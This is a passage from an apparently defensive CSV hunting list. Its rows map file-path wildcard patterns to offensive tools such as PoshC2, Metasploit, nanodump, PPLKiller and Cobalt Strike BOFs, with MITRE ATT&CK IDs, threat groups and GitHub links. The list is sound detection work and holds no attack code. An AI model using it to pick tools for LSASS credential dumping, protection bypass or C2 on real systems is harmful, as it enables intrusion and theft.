- T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*/posh.tpl*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*/PoshC2*,offensive_tool_keyword,poshc2,PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and lateral movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*/poshc2-*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*/PoshC2/*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*/posh-config*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*/posh-log*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*/posh-project*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*/posh-server*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*/posh-service*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*/posh-stop-service*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*/posh-update*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*/post_exploitation*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/PostDump.exe*,offensive_tool_keyword,POSTDump,perform minidump of LSASS process using few technics to avoid detection.,T1003.001 - T1055 - T1564.001,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/YOLOP0wn/POSTDump,1,1,N/A,10,2,172,21,2023-09-15T11:24:50Z,2023-09-13T11:28:51Z -*/POSTDump.git*,offensive_tool_keyword,POSTDump,perform minidump of LSASS process using few technics to avoid detection.,T1003.001 - T1055 - T1564.001,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/YOLOP0wn/POSTDump,1,1,N/A,10,2,172,21,2023-09-15T11:24:50Z,2023-09-13T11:28:51Z -*/postLegit/grkg*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*/postLegit/qhwl*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*/PowerBruteLogon*,offensive_tool_keyword,PowerBruteLogon,Bruteforce cracking tool for windows users,T1110 - T1110.001 - T1110.002,TA0008 - TA0006 - TA0005,N/A,N/A,Credential Access,https://github.com/DarkCoderSc/PowerBruteLogon,1,1,N/A,N/A,2,112,21,2022-03-04T14:12:08Z,2021-12-01T09:40:22Z -*/PowerExtract.git*,offensive_tool_keyword,powerextract,This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process,T1003 - T1055 - T1003.001 - T1055.012,TA0007 - TA0002,N/A,N/A,Credential Access,https://github.com/powerseb/PowerExtract,1,1,N/A,N/A,1,99,14,2023-07-19T14:24:41Z,2021-12-11T15:24:44Z -*/PowerExtract.git*,offensive_tool_keyword,powerextract,This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process,T1003 - T1055 - T1003.001 - T1055.012,TA0007 - TA0002,N/A,N/A,Credential Access,https://github.com/powerseb/PowerExtract,1,1,N/A,N/A,1,99,14,2023-07-19T14:24:41Z,2021-12-11T15:24:44Z -*/powerfun.ps1*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/powerglot/*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*/powerloader.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/Powermad.git*,offensive_tool_keyword,Powermad,PowerShell MachineAccountQuota and DNS exploit tools,T1087 - T1098 - T1018 - T1046 - T1081,TA0007 - TA0006 - TA0005 - TA0001,N/A,N/A,POST Exploitation tools,https://github.com/Kevin-Robertson/Powermad,1,1,N/A,N/A,10,1021,171,2023-01-11T00:48:35Z,2017-09-05T18:34:03Z -*/power-pwn.git*,offensive_tool_keyword,power-pwn,An offensive and defensive security toolset for Microsoft 365 Power Platform,T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002,TA0003 - TA0004 - TA0005 - TA0001,N/A,N/A,Exploitation tools,https://github.com/mbrg/power-pwn,1,1,N/A,10,4,360,34,2023-09-12T12:44:44Z,2022-06-14T11:40:21Z -*/PowerSCCM.git*,offensive_tool_keyword,PowerSCCM,PowerSCCM - PowerShell module to interact with SCCM deployments,T1059.001 - T1018 - T1072 - T1047,TA0005 - TA0003 - TA0002,N/A,N/A,Exploitation tools,https://github.com/PowerShellMafia/PowerSCCM,1,1,N/A,8,4,301,110,2022-01-22T15:30:56Z,2016-01-28T00:20:22Z -*/PowerSharpPack.git*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*/powershell/process_injection/*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1027 - T1055 - T1070 - T1112 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*/powershell_executor/*.go*,offensive_tool_keyword,mythic,mythic C2 agent,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/freyja/,1,1,N/A,10,10,11,6,2023-06-30T16:35:47Z,2022-09-28T17:20:04Z -*/PowershellKerberos.git*,offensive_tool_keyword,PowershellKerberos,Some scripts to abuse kerberos using Powershell,T1558.003 - T1558.004 - T1059.001,TA0006 - TA0002,N/A,N/A,Exploitation Tools,https://github.com/MzHmO/PowershellKerberos,1,1,N/A,9,3,262,37,2023-07-27T09:53:47Z,2023-04-22T19:16:52Z -*/PowerShx.git*,offensive_tool_keyword,PowerShx,Run Powershell without software restrictions.,T1059.001 - T1055.001 - T1055.012,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/iomoath/PowerShx,1,1,N/A,7,3,267,46,2021-09-08T03:44:10Z,2021-09-06T18:32:45Z -*/PowerTools*,offensive_tool_keyword,empire,Empire power tools like powerview powerbreach powerpick powerup,T1003 - T1078 - T1059 - T1069,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Information Gathering,https://github.com/PowerShellEmpire/PowerTools,1,0,N/A,N/A,10,1931,826,2021-12-28T21:00:42Z,2014-03-06T14:49:51Z -*/PowerView.cna*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*/PowerView.ps1*,offensive_tool_keyword,SharpView,C# implementation of harmj0y's PowerView,T1018 - T1482 - T1087.002 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,Discovery,https://github.com/tevora-threat/SharpView/,1,1,N/A,10,9,850,206,2021-12-17T15:53:20Z,2018-07-24T21:15:04Z -*/PowerView3.cna*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script menu for Powerview/SharpView,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/PowerView3-Aggressor,1,1,N/A,10,10,125,39,2018-07-24T21:52:03Z,2018-07-24T21:16:10Z -*/PPEnum/*,offensive_tool_keyword,cobaltstrike,Simple BOF to read the protection level of a process,T1012,TA0007,N/A,N/A,Reconnaissance,https://github.com/rasta-mouse/PPEnum,1,1,N/A,N/A,1,90,7,2023-05-10T16:41:09Z,2023-05-10T16:38:36Z -*/ppl/ppl.c*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*/ppl_dump.*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*/PPLBlade.git*,offensive_tool_keyword,PPLBlade,Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.,T1003.001 - T1027.004 - T1560.001 - T1039 - T1570,TA0006 - TA0005 - TA0010 - TA0003,N/A,N/A,Credential Access - Data Exfiltration,https://github.com/tastypepperoni/PPLBlade,1,1,N/A,10,4,324,36,2023-08-30T07:59:51Z,2023-08-29T19:36:04Z -*/ppldump.*,offensive_tool_keyword,cobaltstrike,A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/PPLDump_BOF,1,1,N/A,10,10,131,24,2021-09-24T07:10:04Z,2021-09-24T07:05:59Z -*/PPLDump_BOF/*,offensive_tool_keyword,cobaltstrike,A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/PPLDump_BOF,1,1,N/A,10,10,131,24,2021-09-24T07:10:04Z,2021-09-24T07:05:59Z -*/PPLFault/*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,1,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z -*/PPLKiller.git*,offensive_tool_keyword,PPLKiller,Tool to bypass LSA Protection (aka Protected Process Light),T1547.002 - T1558.003,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/RedCursorSecurityConsulting/PPLKiller,1,1,N/A,10,8,744,127,2022-12-04T23:38:31Z,2020-07-06T10:11:49Z -*/PPLKiller/*,offensive_tool_keyword,PPLKiller,Tool to bypass LSA Protection (aka Protected Process Light),T1547.002 - T1558.003,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/RedCursorSecurityConsulting/PPLKiller,1,1,N/A,10,8,744,127,2022-12-04T23:38:31Z,2020-07-06T10:11:49Z -*/pptp-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/prepare.sh shell/mod_*.htaccess*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,0,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*/PrimusC2*,offensive_tool_keyword,primusC2,another C2 framework,T1090 - T1071,TA0011 - TA0002,N/A,N/A,C2,https://github.com/Primusinterp/PrimusC2,1,1,N/A,10,10,42,4,2023-08-21T04:05:48Z,2023-04-19T10:59:30Z -*/PrimusC2.git*,offensive_tool_keyword,primusC2,another C2 framework,T1090 - T1071,TA0011 - TA0002,N/A,N/A,C2,https://github.com/Primusinterp/PrimusC2,1,1,N/A,10,10,42,4,2023-08-21T04:05:48Z,2023-04-19T10:59:30Z -*/printerbug.py*,offensive_tool_keyword,krbrelayx,Kerberos unconstrained delegation abuse toolkit,T1558.003 - T1098,TA0004 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dirkjanm/krbrelayx,1,1,N/A,N/A,2,900,148,2023-09-07T20:11:36Z,2019-01-08T18:42:07Z -*/PrintMonitorDll.*,offensive_tool_keyword,cobaltstrike,A BOF to automate common persistence tasks for red teamers,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/IcebreakerSecurity/PersistBOF,1,1,N/A,10,10,222,41,2023-03-07T11:23:42Z,2022-03-29T14:50:47Z -*/PrintMonitorDll/*,offensive_tool_keyword,cobaltstrike,A BOF to automate common persistence tasks for red teamers,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - 